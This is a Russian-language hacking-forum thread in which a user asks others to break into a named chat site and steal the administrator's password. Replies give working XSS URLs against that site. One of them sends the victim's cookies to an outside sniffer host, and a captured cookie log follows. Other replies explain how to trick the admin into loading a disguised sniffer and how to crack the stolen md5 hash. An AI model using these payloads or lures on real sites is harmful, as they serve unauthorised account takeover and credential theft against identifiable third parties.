Здраствуйте, уважаемая администрация AntiChat.ru да и все остальные люди, сидящие на форуме :)

У меня к Вам огромная просьба. Очень хотелось бы, чтобы Вы взломали чат http://chat.ctc-tv.ru и смогли узнать пароль администратора чата. Логин boston.

Заранее, благодарен. Пароль прошу выслать на этот e-mail maxbog2002@yandex.ru

ага все сразу же побежали <<за благодарность
------------------------------------------------------
за $ предложил бы

Ну помогите задаром плиз!

http://chat.ctc-tv.ru/cgi/newchat.exe?<script>alert();</script>

А что за ссылка? Я ввел, вылезло окошко и Test =
Query =
Form =


Что с этим делать? Объясните пожалуйста!

Ну еще у тебя алерт выскочил, да?!
Теперь заходи в раздел ХСС на форуме и читай про это!

Пуф, а без чтения не получится? Ты, пожалуйста, точно скажи, получится ли вообще, или нет. И если да, то пришли мне на мыло результат. Умоляю!

http://chat.ctc-tv.ru/cgi/newchat.exe?Com=Send&Get=OneMessages&Login=<script>alert(document.cookie);</script>&Room=1&SID=
Вот тебе еще одна ХСС! Какой тебе результат прислать??? Знаешь, я в универе сейчас научную работу пишу, поэтому мне не до результатов.

Именно пароль мне интересен. Или как вводить логин и узнавать пароль для него. Вот что.

P.s. Извини, что отвлекаю от научной работы.

А зачем тебе вводить логин(ваще не понял куда ты его собрался пихать) не зная пароль?! Мани народ на сниффер! Про снифер читай тут(http://antichat.ru/sniff/)!
П.С. без читалова ниче не выйдет, конечно если тебе не помогут тут!!!
ПОка! :)

Ну блин. Вот ты мне дал ссылку с Xss. Мне надо было узнать пароль администратора. Как мне его узнать? При помощи этой ссылке? И вообще для чего она нужна в данном случаи? Объясни пожалуйста!

Объясните ламеру на пальцах! Очень прошу!

никак, троянь админа, ставь снифферы и т.д., только тогда может что то выйдет. хотя может база пассов где то лежит.

А как просечь эту базу пассов?

а я ипу? если там вообще таковая имееться.

Если ты не ипешь, то зачем тогда отписываешься? :) Скажи свое предложение по взлому.)

я предлагаю возможные варианты для сливания паролей.
я так мельком глянул, вроде при реге цвет текста символами ставиться... просмотри внимательнее сам
p.s. форум посмотри. в разделе Уязвимости форумов, форум там phpbb, может пасс на форум и чат один.
p.s.s.Воткни снифер в анкету, во ввод домашней страницы или ещё что и разведи админа на то, чтобы он просмотел твою анкету (инфу по другому), потом скачай прогу md5hashes и бруть пароль, по пповоду md5 тоже написано в разделе "Уязвимости форумв"

2 DJ Frost, ну что получил хеш ?!
Вроде Антошка2003 все объяснил и показал пальцем..

Не получил. Может кто в аську зайти? Объяснить не через форум.

что получил, торможу что то.

Закинь сниффер в свою анкету http://antichat.ru/cgi-bin/s.jpg, на поле Мой сайт.
И сделай так чтоб Админ просмотрел анкету. Потом если все будет тип-топ,
сниффер свое дело сделает..

Есть еще один старый тупой способ, пишешь пост и со ссылкой на http://antichat.ru/cgi-bin/s.jpg и гриш ПОСМОТРИТЕ ПРИКОЛ или что нить в этом роде. они нажимают. а ты тем временим будешь смотреть лог на http://antichat.ru/sniff/log.php будешь ждать хеш своего админа примерно будет выглядит так
member_id=62; pass_hash=2374793277fbb618d2f337d458239719;
ну я так думаю ты знаешь id твоей жертвый ?!

я уже говорил об этом

2 Антошка2003 я в курсе.. Он просто не понял... Вот и до словно пишу.. :)

Тот админ редко заходит. Ну получу я хеш? И что с ним делать?

О а дальше брат серьёзное дело... Расшифровка.
Качаешь PasswordPro и словариков к нему и начинаешь расшифровывать тот хэш который ты вытащил с форума.

Сможете помочь? :)

С расшифровкой ?

Да, если можно. )

посари http://forum.antichat.ru/thread9373.html

делай всё сам, всё написано доступным текстом, за тебя делать никто не будет, только советовать.

и это правда... Если возникнут вопросы. пиши, только сначала ищи в форуме. Об этой теме очень много сказано тут.

А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...;)

Значит, как я понял, я получу со сниффера информацию, а затем её засуну в прогу для расшифрования хешей и получу пароль админа??? :)


Тока проблем. А можно как-нить просечь, есть ли там база с пассами? Админ, который мне нужен очень редко заходит. Что в этом случаи делать?

Да:) по поводу снифа смотри http://forum.antichat.ru/forum37.html
и смотри видео по взлому http://video.antichat.net/videos/Silveran/chatmoscow.rar

Влад, эт ты типа мне уже написал о том нашем разговоре?))))
Я тоже думал об этом, просто ему еботни много, хотя...

_http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

[Sun Oct 2 14:23:53 2005] IP=84.ххх.ххх.ххх SITE=chat.ctc-tv.ru
REFERER=http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
QUERY=NAME=03862766249104212349; DISSID; DISNUM; login=extaze
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102); .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322)

да это ничего не даст, пример ток.

а я ему пример и показал...
я просто в логе снифа видел всякие там попытки...

Не х.я не получилось :( :(

Цитата

А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...Цитата
Снивер ты туда не зальешь можно взломать через скрипты но пробовать тебе пбесплатно никто не будет.

А если упросить хотя бы показать, как через скрипты?

Вобщем, как я понял, нихто не поможет.

Помогите разобраться в уязвимости htp://www.chat.kg примерно подскажите что там есть если можно то в ПМ еси что пасиба